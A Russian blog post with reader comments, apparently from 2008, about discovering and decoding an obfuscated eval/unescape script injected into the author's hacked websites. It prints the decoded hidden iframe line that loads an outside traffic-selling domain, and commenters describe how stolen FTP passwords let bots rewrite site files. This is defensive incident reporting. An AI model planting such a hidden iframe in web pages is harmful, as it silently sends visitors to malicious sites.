Познавательный блог  

Поиск по сайту

Гугль

Архивы

Чертовы барыги и их IFRAME трафик.

Чертовы барыги и их IFRAME трафик. Сегодня обнаружил, что на нескольких сайтах вылетают ошибки с сессиями и постоянно грузится какой-то левый сайт orentraff.cn.

Не долго ковырявшись в коде страниц обнаружил странный код:

<script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74."));
</script>

Спросил у другана что за команды eval и unescape. eval - Выполняет код, а unescape - конвертирует символы.

Заменив функцию EVAL на document.write. И открыв это в html документе я увидел еще один зашифрованный текст.

document.write('\u003c\u0069\u0066\u0072\u0061.');

Поковырявшись по форумам нашел топик, где парень столкнулся с той же проблемой, что я и. Оказалось \u003c это код символа в юникоде или в asci.

Затем я открыл этот гнусный код заменив в нем document.write на alert. И получил окошко сообщением, в котором и была волшебная строчка.

<iframe src="http://orentraff.cn/in.cgi?13" style="display:none"></iframe>

Гнусявый IFRAME. Судя по всему поломали один из моих сайтов и залили это добро кругом. Благо успел быстро вычистить и удалит бажный скрипт. Так что будьте аккуратны, следите за безопасностью своих сайтов. Иначе вас превратят в рассадник вирусов и копрофильской порнухи.

Бесплатный антивирус Avast скачать для компьютера.

Комментарии

Комментарий от Анатолий [ Май 12, 2008, 10:52 ]

ТОлько что вот вычистил свой сайт от этой шняги…вопрос..как она там оказалась?

Комментарий от kas [ Май 12, 2008, 13:24 ]

Сайт поимели и залили этот iframe. Там целый бизнес.

Комментарий от vova [ Июль 10, 2008, 09:01 ]

как вы все это удалили быстро и везде?)
или в каждом файле просто строчку потереть?

Комментарий от kas [ Июль 10, 2008, 15:00 ]

Они записывают этот код в какой-то один файл дивжка. Ищи в какой именно, у меня заражали конфиг.пхп

Комментарий от Ленар [ Июль 16, 2008, 12:49 ]

У нас корпоративный сайт хакнули так. Причем на хостинге стояла платежная система, мы испугались, вдруг платежку хотели хакнуть, оказалось торговцы трафиком :)

Комментарий от валерий [ Октябрь 9, 2008, 10:31 ]

добрый день! тоже попал на данный скрипт! после нескольких удалений, скрипт исчез, но появился другой — google-analistic. прописываться в файлах темы. чищу каждый ден, но не прет. а вы окончательно избавились от проблемы?! если не сложно, ответье на мыло

Комментарий от BREND [ Декабрь 12, 2008, 15:31 ]

Я только что удалил эту поганку с сайта.

Писался в файлы index.html, index.php, login.html в виде document.write(unescape(

Комментарий от TiamatInc [ Февраль 26, 2009, 13:56 ]

Меня этот iFrame трафик тоже уже достал. Мой сайт не взламывали, но в Инете столько горе-мастеров которые думают, что если на свои сайт поставить код подобных партнёрк, то можно много денег заработать. То страница по полчаса грузится, то вирусы лезут, то левые сайты рушат этот их невидимый фрейм и открываются в полный рост… Вот неужели люди думают, что копейки заработанные с такого трафика окупят потерю посетителей

Комментарий от фыв [ Апрель 11, 2009, 20:59 ]

Всё это — результат того, что вы сохраняете логин и пароль в ваших фтп-клиентах. ПРАВИЛЬНО ТАК:
в Total commandere, например, хранить действительный логин и вымышленный пароль. Если вирус попадёт на ваш рабочий комп, то даже будучи заблокирован, он успевает отослать на сервер украденные пароли, логины и фтп-адреса (те что вы сохраняли в винде). А потом в любой момент программа-робот начнёт обходить все эти сайты по фтп и если логин-пароль подходит — все файлы index,main,login будут перезаписаны с включением iframe. Единственный способ — сменить пароль, а иначе бот будет ходить по кругу и переписывать файлы снова и снова.

Комментарий от Хакнутый Хакер [ Ноябрь 9, 2010, 22:30 ]

Помогите!!! Я нече не могу сделать!!!
1)У меня стоит аутпост (файрвол такой)… с пирацкой лицензией:-)
2)При гулянии на просторах интернета при запуске любово сайта в штуке где показывается адрес откудова грузится страница всегда есть сайт megaaploadzz.com
Снифил скачаные файлы, отправлял на вирустотал — результат 0, все чисто…
3)В системе вроде вирусы не наблюдаются (Есть Аваст! 5 бесплатный и Антивирус от мелкомягких)…
4)Появилось около года назад…
5)Использую оперу:)

Комментарий от Хакнутый Хакер [ Ноябрь 9, 2010, 22:32 ]

Fail
Сайт megauploadzz.com — вроде файлообменик на первый взгляд…

Написать комментарий








Страницы

Свежие записи

Гугль

Мета

Счетчики


Rambler's Top100

Рубрики

  Разработка и дизайн — StvPromo.ru